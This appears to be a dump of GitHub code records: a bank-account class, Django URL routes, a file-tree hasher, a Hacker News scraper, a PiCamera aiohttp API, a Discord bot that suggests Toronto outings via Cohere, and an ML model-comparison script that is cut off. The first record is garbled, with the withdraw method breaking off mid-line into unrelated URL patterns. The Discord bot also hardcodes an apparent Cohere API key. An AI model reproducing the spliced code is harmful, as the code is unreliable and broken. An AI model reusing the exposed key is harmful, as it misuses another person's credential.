+{"seq_id":"10954940209","text":"class Account(object):\n \"\"\"This creates simple bank account\"\"\"\n def __init__(self, name, balance):\n #This method creates account with initial balance\n self.name = name\n self.balance = balance\n\n def deposit(self, amount):\n #this method adds money to account\n if amount >0:\n self.balance += amount\n self.show_balance()\n\n def withdraw(self, amount):\n #this takes money from account\n if 0/', PostDetailView.as_view(), name='post-detail'),\n path('post/delete/<int:pk>/', views.post_delete, name='post-delete'),\n path('post/edit/<int:pk>/', PostEditView.as_view(), name='post-edit'),\n path('post/comment/delete/<int:pk>/', views.comment_delete, name='comment-delete'),\n path('like/', views.like, name='post-like'),\n path('share/<int:pk>/', SharePostView.as_view(), name='share-post'),\n path('inbox/', ListThreads.as_view(), name='inbox'),\n path('inbox/create-thread/', CreateThread.as_view(), name='create-thread'),\n path('inbox/<int:pk>/', ThreadView.as_view(), name='message-thread'),\n path('inbox/<int:pk>/create-message', CreateMessage.as_view(), name='create-message'),\n path('notification/delete/', DeleteNotificaiton.as_view(), name='delete-notification'),\n path('search_posts/', views.search_posts, name='search_posts'),\n path('search/', views.search, name='search'),\n path('posts/', views.post_page, name='post-page'),\n path('users/create-thread/<int:pk>/', views.CreateThreadButton, name='create-thread-button'),\n]\n","repo_name":"thkirby/Group10","sub_path":"feed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"24500381412","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ndirtreewalk.\n\nProgramme to list all files and subdirectories of a given directory path. 
\nThe MD5 sum is calculated for every file.\n\nUsage:\n dirtreewalk.py <path>...\n dirtreewalk.py -h | --help\n dirtreewalk.py --version\n\nOptions:\n -h --help Show this information.\n --version Show version.\n\n\"\"\"\n\nfrom docopt import docopt\nimport os, sys, hashlib\n\n__author__ = \"Lisa Trage\"\n\n'''\nFunction to recursively list all subdirectories and files of a given directory.\n'''\ndef treewalk(path):\n try:\n all_files = os.listdir(path)\n except (PermissionError):\n print('You do not have permissions to read from this directory: {}.'.format(path))\n return\n except (FileNotFoundError, TypeError):\n print ('You did not enter a valid path.')\n return\n\n for item in all_files:\n full_path = os.path.join(path,item)\n rel_path = create_rel_path(path, item)\n \n if os.path.isdir(full_path):\n print(\"<DIR>\".ljust(15, ' '), item.ljust(40, ' '), rel_path.ljust(40, ' '))\n treewalk(full_path)\n\n elif os.path.isfile(full_path):\n print(\"<FILE>\".ljust(15, ' '), item.ljust(40, ' '), rel_path.ljust(40, ' '), calculate_md5_sum(full_path))\n\n elif os.path.islink(full_path):\n print(\"<LINK>\".ljust(15, ' '), item.ljust(40, ' '), rel_path.ljust(40, ' '))\n\n else:\n pass\n\n\n\n'''\nFunction to calculate the MD5 sum of a file.\n'''\ndef calculate_md5_sum(item):\n # hash the file contents rather than the file name\n with open(item, 'rb') as f:\n return hashlib.md5(f.read()).hexdigest()\n\n\n\n'''\nFunction to return the path relative to the given directory.\nAll leading symbols (e.g. ../../example) are removed and the file that\nwas passed to the function is appended in the end.\n'''\ndef create_rel_path(path, item):\n rel_path = os.path.relpath(path, start=os.path.curdir)\n rel_path = rel_path.split('/')\n rel_path.append(item)\n rel_path = [x for x in rel_path if x != '..']\n rel_path.remove(rel_path[0])\n rel_path = '/'.join(rel_path)\n return rel_path\n\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='dirtreewalk 1.0')\n treewalk((arguments['<path>'][0]))\n \n ","repo_name":"atleasticode/dirtreewalk","sub_path":"dirtreewalk.py","file_name":"dirtreewalk.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"6997151192","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\n\n\ndef request_data(num_pages=1):\n links = []\n points = []\n for page in range(1, num_pages+1):\n response = requests.get(f\"https://news.ycombinator.com?p={page}\")\n soup = BeautifulSoup(response.text, \"html.parser\") # converts website data from string to html object\n links += soup.select(\".storylink\")\n subtext = soup.select(\".subtext\") # this is selected before points in the case that points has no value (0)\n for item in subtext:\n points += item.select(\".score\") # stories without a score contribute no element here\n\n return links, points\n\n\ndef filter_list(formatted_list, min_points):\n filtered = []\n for i in range(len(formatted_list)):\n if int(formatted_list[i][\"points\"]) >= min_points:\n filtered.append(formatted_list[i])\n return filtered\n\n\ndef format_data(links, points):\n new_list = []\n for index in range(len(links)):\n title = links[index].text\n href = links[index].get(\"href\")\n if index < len(points) and points[index]:\n # strip the \" points\" suffix to get the numeric score\n score = int(points[index].getText().rstrip(\" points\"))\n else:\n score = 0\n new_list.append({\"title\": title, \"link\": href, \"points\": score})\n\n return new_list\n\n\ndef get_min_points():\n while True:\n try:\n min_points = 
int(input(\"Enter minimum amount of points: \"))\n if min_points < 0:\n print(\"Points cannot be negative\")\n else:\n break\n except ValueError:\n print(\"Not a number\")\n\n return min_points\n\n\ndef get_num_pages():\n while True:\n try:\n num_pages = int(input(\"Enter number of pages to search through: \"))\n if num_pages < 0:\n print(\"Number of pages cannot be negative\")\n else:\n break\n except ValueError:\n print(\"Not a number\")\n\n return num_pages\n\n\ndef sort_by_points(d):\n sorted_dict = sorted(d, key=lambda k: k[\"points\"], reverse=True) # sorts by the points value for each link\n\n return sorted_dict\n\n\ndef main():\n min_points = get_min_points()\n num_pages = get_num_pages()\n response = request_data(num_pages)\n\n links = response[0]\n points = response[1]\n formatted = format_data(links, points)\n filtered = filter_list(formatted, min_points)\n sorted_list = sort_by_points(filtered)\n\n return sorted_list\n\n\nif __name__ == \"__main__\":\n articles = main()\n\n pprint(articles)\n print(f\"\\nFound {len(articles)} articles\")\n","repo_name":"Will-Fahie/hacker-news-data-scraper","sub_path":"hacker_news_scraper.py","file_name":"hacker_news_scraper.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"43190509569","text":"import json\nimport platform\n\nfrom aiohttp import web\n\n# NOTE: camera, logger and get_local_mac are expected to be provided by the surrounding project.\nlast_image = None\n\n\nclass WebHandler():\n def __init__(self):\n pass\n\n\nasync def web_index(request):\n return web.Response(text = 'Hello Aiohttp!')\n\nasync def web_binary_image(request):\n if last_image is None:\n response = web.Response(\n status = 500,\n text = \"Request failed\"\n )\n else:\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n body = last_image\n )\n return response\n\nasync def web_resolution(request):\n width, height = camera.resolution\n\n response = web.Response(\n status = 200,\n text = \"{}x{}\".format(width, height)\n )\n return response\n\nasync def web_framerate(request):\n fr = float(camera.framerate)\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n text = str(fr)\n )\n return response\n\nasync def web_shutter_speed(request):\n sh = camera.shutter_speed\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n text = str(sh)\n )\n return response\n\nasync def web_exposure_mode(request):\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n text = camera.exposure_mode\n )\n return response\n\nasync def web_set_exposure_mode(request):\n try:\n camera.exposure_mode = await request.text()\n response = web.Response(\n status = 200\n )\n return response\n except Exception as e:\n logger.exception(\"Failed to set exposure mode\")\n response = web.Response(\n status = 500,\n text = str(e)\n )\n return response\n\nasync def web_set_resolution(request):\n try:\n camera.resolution = await request.text()\n response = web.Response(\n status = 200\n )\n return response\n except Exception as e:\n logger.exception(\"Failed to set resolution\")\n response = web.Response(\n status = 500,\n text = str(e)\n )\n return response\n\nasync def web_set_framerate(request):\n try:\n camera.framerate = await request.text()\n response = web.Response(\n status = 200\n )\n return response\n except Exception as e:\n logger.exception(\"Failed to set framerate\")\n response = web.Response(\n status = 500,\n text = str(e)\n )\n return response\n\n\nasync def web_thing_description(request):\n host = platform.node()\n desc = {\n \"name\": 
host,\n \"mac_address\": get_local_mac(),\n \"type\": \"camera\",\n \"description\": \"PiCamera\",\n \"properties\": {\n \"resolution\": {\n \"type\": \"string\",\n \"description\": \"The current camera resolution\",\n \"href\": \"/properties/resolution\"\n },\n \"framerate\": {\n \"type\": \"string\",\n \"description\": \"The current camera frame rate\",\n \"href\": \"/properties/framerate\"\n },\n \"shutterSpeed\": {\n \"type\": \"number\",\n \"description\": \"The current camera shutter speed\",\n \"href\": \"/properties/shutterSpeed\"\n },\n \"exposureMode\": {\n \"type\": \"string\",\n \"description\": \"The current camera exposure mode\",\n \"href\": \"/properties/exposureMode\"\n }\n }\n }\n response = web.Response(\n status = 200,\n content_type = 'application/json',\n body = json.dumps(desc).encode('utf-8')\n )\n return response\n\nasync def web_loop():\n logger.info('Starting web loop...')\n\n app = web.Application()\n app.router.add_get('/', web_index)\n app.router.add_get('/webthing', web_thing_description)\n\n app.router.add_get('/properties/stillImage', web_binary_image)\n app.router.add_get('/properties/resolution', web_resolution)\n app.router.add_get('/properties/framerate', web_framerate)\n app.router.add_get('/properties/shutterSpeed', web_shutter_speed)\n app.router.add_get('/properties/exposureMode', web_exposure_mode)\n\n app.router.add_put('/properties/exposureMode', web_set_exposure_mode)\n app.router.add_put('/properties/resolution', web_set_resolution)\n app.router.add_put('/properties/framerate', web_set_framerate)\n\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, '0.0.0.0', 80)\n await site.start()\n","repo_name":"infincia/pi-sensor","sub_path":"webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36232735706","text":"# 나누어 떨어지는 숫자 배열\r\n# 1차 시도 통과\r\n\r\n\r\ndef solution(arr, divisor):\r\n answer = list(i for i in arr if i % divisor == 0)\r\n if len(answer) == 0:\r\n return [-1]\r\n return sorted(answer)\r\n\r\nprint(solution([5, 9, 7 ,10], 5))\r\n\r\n\r\n'''\r\n타인풀이\r\n\r\ndef solution(arr, divisor): return sorted([n for n in arr if n%divisor == 0]) or [-1]\r\n\r\n한줄풀이\r\nreturn sorted([n for n in arr if n % divisor == 0]) or [-1]\r\nlist_a or list_b는 \r\nlist_a가 거짓일때 list_b가 호출됨\r\n즉 list_a가 비어있을때 list_b 호출\r\n\r\n'''","repo_name":"jomujin/Skill_Check","sub_path":"PROGRAMMERS_SKILLCHECK/SC_level1/SC_level1_12910.py","file_name":"SC_level1_12910.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11628919623","text":"from django.core.management import BaseCommand\nfrom django.core.management.color import no_style\nfrom django.db import connection\nfrom django.db.models import RestrictedError\n\nfrom resumes_vacancies.models import DirectionsModel, WorkTimeModel\n\n\nclass Command(BaseCommand):\n __directions = [\n 'IT, комп\\'ютери, інтернет',\n 'Адмiнiстрацiя, керівництво середньої ланки',\n 'Будівництво, архітектура',\n 'Бухгалтерія, аудит, секретаріат, діловодство, АГВ',\n 'Готельно-ресторанний бізнес, туризм, сфера обслуговування',\n 'Дизайн, творчість',\n 'ЗМІ, видавництво, поліграфія',\n 'Краса, фітнес, спорт',\n 'Культура, музика, шоу-бізнес',\n 'Логістика, склад, ЗЕД',\n 'Маркетинг, реклама, PR, телекомунікації та зв\\'язок',\n 'Медицина, фармацевтика',\n 'Нерухомість',\n 'Освіта, 
наука',\n 'Охорона, безпека',\n 'Продаж, закупівля',\n 'Робочі спеціальності, виробництво',\n 'Роздрібна торгівля',\n 'Сільське господарство, агробізнес',\n 'Транспорт, автобізнес',\n 'Фінанси, банк',\n 'Управління персоналом, HR',\n 'Юриспруденція',\n ]\n\n __work_times = [\n 'Повна зайнятість',\n 'Неповна зайнятість',\n 'Дистанційна робота',\n ]\n\n def handle(self, *args, **options):\n try:\n DirectionsModel.objects.all().delete()\n WorkTimeModel.objects.all().delete()\n\n sequence_sql = connection.ops.sequence_reset_sql(no_style(), [DirectionsModel, WorkTimeModel])\n with connection.cursor() as cursor:\n for sql in sequence_sql:\n cursor.execute(sql)\n\n for i in self.__directions:\n entity = DirectionsModel(\n direction=i\n )\n entity.save()\n print('Added direction:', i)\n\n for i in self.__work_times:\n entity = WorkTimeModel(\n work_time=i\n )\n entity.save()\n print('Added work time:', i)\n print('Finish')\n except RestrictedError:\n pass\n","repo_name":"mmeerrccyy/profcom_api","sub_path":"resumes_vacancies/management/commands/setup_database.py","file_name":"setup_database.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35138715394","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 15 21:05:21 2017\n\n@author: chris\n\n\nThis will download the necessary files from Tatoeba. These files contain \nthe relationsships between the different langauge sentences, the sentences with\naudio, the user etc.\n\nIt will also download ffmpeg which is needed to handle the audio files and \ncombine them. It will place the file in the needed folder\n\"\"\"\n\nimport tarfile\nimport os\nimport re\nimport urllib.request\nimport subprocess\n\ndef Download_Tars():\n files = ['http://downloads.tatoeba.org/exports/sentences.tar.bz2',\n 'http://downloads.tatoeba.org/exports/links.tar.bz2',\n 'http://downloads.tatoeba.org/exports/sentences_with_audio.tar.bz2']\n \n folder = os.getcwd()\n \n \n for file in files:\n #gets the correct file extension\n name = re.split(r'/',file)[-1]\n filename = os.path.join(folder, name)\n urllib.request.urlretrieve(file,filename)\n \n tar=tarfile.open(filename)\n tar.extractall()\n tar.close()\n \n \n \n'''\n this is a 'utility' used to install packages\n this script will download all of the packages that are needed for \n this project\n'''\nimport pip\n\n\ndef install(package):\n pip.main(['install', package])\n\npackages = ['pydub','urllib.request','os','sys','numpy','pandas','random','sys','site','textstat','subprocess']\n\ndef Install_All():\n for package in packages:\n install(package)\n \n \n'''\nlibav doesn't seem to work as well as ffmpeg so I am not using this.\nI don't know how to edit this for ffmpeg the user need to do this manually \ndef get_ffmpeg():\n \n folder = os.getcwd()\n \n \n #https://stackoverflow.com/questions/2208828/detect-64bit-os-windows-in-python\n def os_arch():\n os_arch = '32-bit'\n if os.name == 'nt':\n output = subprocess.check_output(['wmic', 'os', 'get', 'OSArchitecture'])\n os_arch = output.split()[1]\n else:\n output = subprocess.check_output(['uname', '-m'])\n if 'x86_64' in output:\n os_arch = '64-bit'\n else:\n os_arch = '32-bit'\n return os_arch\n\n \n \n \n if os_arch == '64-bit':\n url = r\"http://builds.libav.org/windows/release-gpl/libav-0.8.17-win64.7z\"\n filename = 'libav-64.7z'\n else:\n url = r\"http://builds.libav.org/windows/release-gpl/libav-0.8.17-win32.7z\"\n filename = 'libav-32.7z'\n \n filename = 
os.path.join(folder,filename)\n \n urllib.request.urlretrieve(url,filename)\n\n\nprint('what up')\nget_ffmpeg()\n'''\n\nInstall_All()\nDownload_Tars()\n\n","repo_name":"Christhomas17/Tatoeba_Audio_SRS","sub_path":"FirstTime.py","file_name":"FirstTime.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"12713506097","text":"import discord\nfrom discord.ui import Button, View\nfrom discord.ext import commands\nimport json\nfrom os import environ\nfrom dotenv import load_dotenv\nimport clean_file_with_algorithm\nimport cohere\nimport clean_file_with_algorithm as algorithm\n\n\nload_dotenv()\ntoken = environ[\"TOKEN\"]\n\nintents = discord.Intents.all()\n\nclient = commands.Bot(command_prefix='!', intents=intents)\n\noptions = {\"1\": '😄', \"2\": '🙂', \"3\": '😐', \"4\": '🙁', \"5\": '😢'}\ncolours = {\"1\": discord.ButtonStyle.green, \"2\": discord.ButtonStyle.blurple,\n \"3\": discord.ButtonStyle.grey, \"4\": discord.ButtonStyle.blurple,\n \"5\": discord.ButtonStyle.red}\n\nemotions = {\"Stress\": 0, \"Boredom\": 0, \"Loneliness\": 0, \"Anger\": 0,\n \"Sadness\": 0}\n\nanswers = []\n\nemotions_streak = []\n\n\n@client.event\nasync def on_ready():\n print('bot ready')\n\n\nclass MyButton(Button):\n def __init__(self, name, color, emoji, emotion):\n super().__init__(label=name, style=color, emoji=emoji)\n self.emotion = emotion\n\n async def callback(self, interaction: discord.Interaction):\n # ! Update the dictionary\n if ',' in self.emotion:\n emotion1 = self.emotion.split(',')[0].strip()\n emotion2 = self.emotion.split(',')[1].strip()\n else:\n emotion1 = emotion2 = self.emotion\n for key in emotions:\n if key == self.emotion or key == emotion1 or key == emotion2:\n emotions[key] += int(self.label)\n await interaction.response.send_message(\n \"Thanks! Your input of \" + self.label + \" has been recorded.\")\n answers.append(int(self.label))\n\n\nclass MyView(View):\n emotions = emotions\n\n def __init__(self):\n super().__init__() # timeout=10.0)\n\n async def button_callback(self, interaction: discord.Interaction):\n await interaction.response.edit_message(view=self)\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n # !Help command\n if message.content.startswith('!help'):\n embed_var = discord.Embed(title=\"Help\",\n color=discord.Colour.light_grey())\n embed_var.add_field(name=\"About\",\n value=\"VentBot is a tool that helps you destress!\",\n inline=True)\n embed_var.add_field(name=\"Usage\", value=\"!vent\", inline=False)\n await message.channel.send(embed=embed_var)\n\n # ! Main command\n if message.content == '!vent':\n await message.channel.send(\n \"Hey there, I heard you weren't feeling so great! 
\")\n await message.channel.send(\"Here are some questions:\")\n\n f = open(\"questions.txt\", \"r\")\n\n for line in f:\n view = MyView()\n current_emotion = line.split(\"(\")[1].split(\")\")[0]\n for index in options:\n button = MyButton(index, colours[index],\n options[index], current_emotion)\n view.add_item(button)\n\n await message.channel.send(line.split(\"(\")[0], view=view)\n await client.wait_for('message')\n\n f.close()\n\n therapy_bot = clean_file_with_algorithm.TherapyTravel(emotions)\n interests = clean_file_with_algorithm.InterestsList()\n output = clean_file_with_algorithm.emotion_giving_method(therapy_bot,\n interests)\n\n co = cohere.Client(\"MSuvC3ORXmJeWIzxj6D9vIw0QZAhfO6ibEmTlDYG\")\n prompt = f\"\\n Name real locations in Toronto I should go to if I like \"\\\n f\"{output}\"\n\n # moddel = medium or xlarge\n response = co.generate(\n model='c1e4d1a2-5127-494b-8536-3d6845a4f267-ft',\n prompt=prompt,\n max_tokens=35,\n temperature=0.9,\n stop_sequences=[\"--\"]\n )\n\n result = response.generations[0].text\n\n embed_var = discord.Embed(title=\"Here is your custom suggestion!\",\n color=discord.Colour.light_grey())\n embed_var.add_field(name=\"Interests\",\n value=output,\n inline=True)\n embed_var.add_field(name=\"Suggestion\", value=result, inline=False)\n await message.channel.send(embed=embed_var)\n\n\n\nclient.run(token)\n","repo_name":"alexszokolay/Uoft-ECKS","sub_path":"new-en/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9424564242","text":"import numpy as np\nimport os\nimport time\nimport matplotlib.pyplot as plt\nimport random\n\n\nfrom utility.utility_plot import plot_per_b_size, plotRegressions, plotIntersections, plot_per_b_size_folds\nfrom utility.load_dt import load_dt_model\nfrom utility.my_k_fold_cv import load_folds, my_cv_score\n\nfrom sklearn.metrics import r2_score, mean_absolute_percentage_error, balanced_accuracy_score\nfrom sklearn.base import clone\n\n\nfrom modelClass.LR3M import LR3M\n\n# -----------------------------------------------------------\n# Create and test the models LRNNZB.\n#\tLRNNZB (a) is a model that takes as input the number\n#\tof non-zero elements of the right-hand side and predicts\n#\tthe time taken for an algorithm. 
LRNNZB (b) is another \n#\tmodel that also takes the size of b.\n#\n#\tThis file will read the folds \"datasets/mydt/folds\" and \n# \tplot a series of figures comparing LRNNZB (a) and (b) in\n#\tplots/compareLRNNZB\n# -----------------------------------------------------------\n\n\ndef pred_time_cv(folds, indices_used_per_method, modelGeneral, model2Phase, model1Phase, modelName = None):\n\t\n\tr2_train_folds = np.zeros((len(folds), 3))\n\tr2_test_folds = np.zeros((len(folds), 3))\n\n\tbas = np.zeros(len(folds))\n\n\tfold_model_choice_time = np.zeros(len(folds))\n\tfold_best_choice_time = np.zeros(len(folds))\n\tfold_average_choice_time = np.zeros(len(folds))\n\tfold_choose_1phase_time = np.zeros(len(folds))\n\tfold_pred_time = np.zeros(len(folds))\n\n\n\tfold_pred_algo = []\n\tfold_best_algo = []\n\n\n\n\tfor i in range(len(folds)):\n\n\t\tprint(\"Fold %d\"%(i))\n\t\tmodelCloneGeneral = clone(modelGeneral)\n\t\tmodelClone2Phase = clone(model2Phase)\n\t\tmodelClone1Phase = clone(model1Phase)\n\n\n\t\tfold_test = folds[i]\n\n\t\tx_list_general = []\n\t\tx_list_2phase = []\n\t\tx_list_1phase = []\n\t\ty_list = []\n\n\t\tfor j in range(len(folds)):\n\t\t\tif j != i:\n\t\t\t\tfold = folds[j]\n\t\t\t\tx = fold[0]\n\n\t\t\t\tx_list_general.append(x[:, indices_used_per_method[0]])\n\t\t\t\tx_list_2phase.append(x[:, indices_used_per_method[1]])\n\t\t\t\tx_list_1phase.append(x[:, indices_used_per_method[2]])\n\n\t\t\t\ty_list.append(fold[1])\n\n\t\tx_train_general = np.concatenate(x_list_general)\n\t\t\n\t\t\n\t\tx_train_2phase = np.concatenate(x_list_2phase)\n\n\t\t\n\n\t\tx_train_1phase = np.concatenate(x_list_1phase)\n\t\t\n\t\tif len(x_train_general.shape) == 1:\n\t\t\tx_train_general = np.expand_dims(x_train_general, 1)\n\n\t\tif len(x_train_2phase.shape) == 1:\n\t\t\tx_train_2phase = np.expand_dims(x_train_2phase, 1)\n\n\t\tif len(x_train_1phase.shape) == 1:\n\t\t\tx_train_1phase = np.expand_dims(x_train_1phase, 1)\n\n\t\ty_train = np.concatenate(y_list)\n\t\t\n\t\ty_test = fold_test[1]\n\t\tx_test = fold_test[0]\n\n\t\tx_test_general = x_test[:, indices_used_per_method[0]]\n\t\tx_test_2phase = x_test[:, indices_used_per_method[1]]\n\t\tx_test_1phase = x_test[:, indices_used_per_method[2]]\n\n\t\tif len(x_test_general.shape) == 1:\n\t\t\tx_test_general = np.expand_dims(x_test_general, 1)\n\n\t\tif len(x_test_2phase.shape) == 1:\n\t\t\tx_test_2phase = np.expand_dims(x_test_2phase, 1)\n\n\t\tif len(x_test_1phase.shape) == 1:\n\t\t\tx_test_1phase = np.expand_dims(x_test_1phase, 1)\n\n\n\t\ty_train_pred = np.zeros((y_train.shape[0], y_train.shape[1]))\n\t\ty_test_pred = np.zeros((y_test.shape[0], y_test.shape[1]))\n\n\n\t\tmodelCloneGeneral.fit(x_train_general, y_train[:,0])\n\t\tmodelClone2Phase.fit(x_train_2phase, y_train[:,1])\n\t\tmodelClone1Phase.fit(x_train_1phase, y_train[:,2])\n\n\n\t\ty_train_pred[:,0] = modelCloneGeneral.predict(x_train_general)\n\t\ty_train_pred[:,1] = modelClone2Phase.predict(x_train_2phase)\n\t\ty_train_pred[:,2] = modelClone1Phase.predict(x_train_1phase)\n\n\t\tt0 = time.time_ns()\n\t\ty_test_pred[:,0] = modelCloneGeneral.predict(x_test_general)\n\t\ty_test_pred[:,1] = modelClone2Phase.predict(x_test_2phase)\n\t\ty_test_pred[:,2] = modelClone1Phase.predict(x_test_1phase)\n\t\tt1 = time.time_ns()\n\n\t\tt_pred = (t1-t0)/(10**9)\n\n\t\tfold_pred_time[i] = t_pred\n\n\t\tr2_train_folds[i, 0] = r2_score(y_train[:,0], y_train_pred[:,0])\n\t\tr2_train_folds[i, 1] = r2_score(y_train[:,1], y_train_pred[:,1])\n\t\tr2_train_folds[i, 2] = r2_score(y_train[:,2], 
y_train_pred[:,2])\n\n\t\tr2_test_folds[i, 0] = r2_score(y_test[:,0], y_test_pred[:,0])\n\t\tr2_test_folds[i, 1] = r2_score(y_test[:,1], y_test_pred[:,1])\n\t\tr2_test_folds[i, 2] = r2_score(y_test[:,2], y_test_pred[:,2])\n\n\n\t\tpred_algo = np.argmin(y_test_pred, axis=1)\n\n\n\t\trandom_algo = np.mean(y_test, axis=1)\n\t\tbest_algo = np.argmin(y_test, axis=1)\n\t\tchoose_1phase = np.ones(best_algo.shape)\n\t\tchoose_1phase = np.multiply(choose_1phase,2).astype(int)\n\t\t\n\n\t\tfold_model_choice_time[i] = np.sum(y_test[np.arange(0, y_test.shape[0]), pred_algo])\n\t\tfold_average_choice_time[i] = np.sum(random_algo)\n\t\tfold_best_choice_time[i] = np.sum(y_test[np.arange(0, y_test.shape[0]), best_algo])\n\t\tfold_choose_1phase_time[i] = np.sum(y_test[np.arange(0, y_test.shape[0]), choose_1phase])\n\n\t\tfold_pred_algo.append(pred_algo)\n\t\tfold_best_algo.append(best_algo)\n\t\tbas[i] = balanced_accuracy_score(best_algo, pred_algo)\n\n\n\tr2_train = np.mean(r2_train_folds, axis = 0)\n\tr2_test = np.mean(r2_test_folds, axis = 0)\n\t\n\tmodel_choice_time = np.mean(fold_model_choice_time)\n\taverage_choice_time = np.mean(fold_average_choice_time)\n\tbest_choice_time = np.mean(fold_best_choice_time)\n\tonephase_choice_time = np.mean(fold_choose_1phase_time)\n\taverage_pred_time = np.mean(fold_pred_time)\n\n\n\tif not(modelName is None):\n\t\tprint(\"---------------%s---------------\" % (modelName))\n\telse:\n\t\tprint(\"-----------------------------------\")\n\n\tprint(\"With regression model %s\"%(type(modelGeneral).__name__))\n\tprint(\"R2 score train = %s\" % (r2_train))\n\tprint(\"R2 score test = %s\"% (r2_test))\n\n\tprint(\"Model choice time (test) = %f s\" % (model_choice_time/(10**7)))\n\tprint(\"Model choice time (test) + pred time = %f s\" % (model_choice_time/(10**7) + average_pred_time))\n\tprint(\"Best choice time = %f s\"% (best_choice_time/(10**7)))\n\tprint(\"Average choice time = %f s\"% (average_choice_time/(10**7)))\n\tprint(\"One phase choice time = %f s\"% (onephase_choice_time/(10**7)))\n\tprint(\"average balanced accuracy = %f\"% (np.mean(bas)))\n\n\tif not(modelName is None):\n\t\tprint(\"---------------%s---------------\" % (modelName))\n\telse:\n\t\tprint(\"-----------------------------------\")\n\n\n\n\treturn fold_pred_algo, fold_best_algo\n\nif __name__ == \"__main__\":\n\n\t\n\tdatasetPath = \"datasets/mydt/folds\"\n\n\tfigPath = \"plots\"\n\n\tif not os.path.isdir(figPath+\"/compareLRNNZB\"):\n\t\tos.mkdir(figPath+\"/compareLRNNZB\")\n\n\tfigPath = figPath+\"/compareLRNNZB\"\n\n\tmodelNames = []\n\n\t#training LRNNZB (a)\n\n\tprint(\"Starting the training and testing of LRNNZB (a)\")\n\tfeatureIndicesL = np.array([3,1])\n\tfeatureIndicesU = np.array([7,5])\n\tsizebIndicesL = np.array([1])\n\tsizebIndicesU = np.array([5])\n\n\tyIndicesL = np.array([11, 12, 13])\n\tyIndicesU = np.array([14, 15, 16])\n\n\tfeatureNames = [\"Number of non-zero elements in b\",\n\t\t\t\t\t\"Number of non-zero elements in b\",\n\t\t\t\t\t\"Number of non-zero elements in b\"]\n\n\t#loads the folds\n\tlist_folds, time_per_fold = load_folds(datasetPath, featureIndicesL, featureIndicesU, yIndicesL, yIndicesU, return_times = True)\n\tlist_folds_size_b = load_folds(datasetPath, sizebIndicesL, sizebIndicesU, yIndicesL, yIndicesU)\n\n\n\t#only take the time of the algorithm and not the feature computation time\n\tfor i in range(len(time_per_fold)):\n\t\t\n\t\tfold_time = time_per_fold[i]\n\n\t\ttime_per_fold[i] = fold_time[:, np.array([0,1,2])]\n\t\n\n\tindices_used_per_method = [0, 0, 
0]\n\n\t#prepare the dataset for intersection plots, etc\n\t#that take 7 folds for training and 3 folds for testing\n\n\tlist_x_test = []\n\tlist_y_test = []\n\tlist_x_train = []\n\tlist_y_train = []\n\n\tfor i in range(len(list_folds)):\n\n\t\tfold = list_folds[i]\n\t\tif i >=7:\n\t\t\tlist_x_test.append(fold[0])\n\t\t\tlist_y_test.append(fold[1])\n\t\telse:\n\t\t\tlist_x_train.append(fold[0])\n\t\t\tlist_y_train.append(fold[1])\n\n\tx_test = np.concatenate(list_x_test)\n\tx_train = np.concatenate(list_x_train)\n\n\tx_test_size_b = x_test[:,1]\n\tx_test = x_test[:,0]\n\t\n\tx_train_size_b = x_train[:,1]\n\tx_train = x_train[:,0]\n\n\n\tx_test = np.expand_dims(x_test, 1)\n\tx_test_size_b = np.expand_dims(x_test_size_b, 1)\n\t\n\tx_train = np.expand_dims(x_train, 1)\n\tx_train_size_b = np.expand_dims(x_train_size_b, 1)\n\n\ty_test = np.concatenate(list_y_test)\n\ty_train = np.concatenate(list_y_train)\n\n\t#train LRNNZB (a)\n\tmodelNames.append(\"LNNZB (a)\")\n\n\tLRNNZBa = LR3M(\"LNNZB (a)\", featureNames)\n\n\tfold_pred_algo_a, fold_best_algo = LRNNZBa.pred_time_cv(list_folds, indices_used_per_method, modelName = \"LRNNZBa\")\n\n\n\tLRNNZBa.regGeneral.fit(x_train, y_train[:,0])\n\tLRNNZBa.reg2Phase.fit(x_train, y_train[:,1])\n\tLRNNZBa.reg1Phase.fit(x_train, y_train[:,2])\n\t\n\tprint(\"Making the intersection plot\")\n\tplotIntersections(LRNNZBa, x_train, x_train, x_train, figPath)\n\n\tprint(\"Making the regressions plot\")\n\tplotRegressions(LRNNZBa, x_train, x_train, x_train, y_train[:,0], y_train[:,1], y_train[:,2], figPath)\n\t\n\n\t#train LRNNZB (b)\n\tLRNNZBb = LR3M(\"LNNZB (b)\", featureNames)\n\tindices_used_per_method = [1,0,0]\n\tfold_pred_algo_b, fold_best_algo = LRNNZBb.pred_time_cv(list_folds, indices_used_per_method, modelName = \"LRNNZBb\")\n\n\tLRNNZBb.regGeneral.fit(x_train_size_b, y_train[:,0])\n\tLRNNZBb.reg2Phase.fit(x_train, y_train[:,1])\n\tLRNNZBb.reg1Phase.fit(x_train, 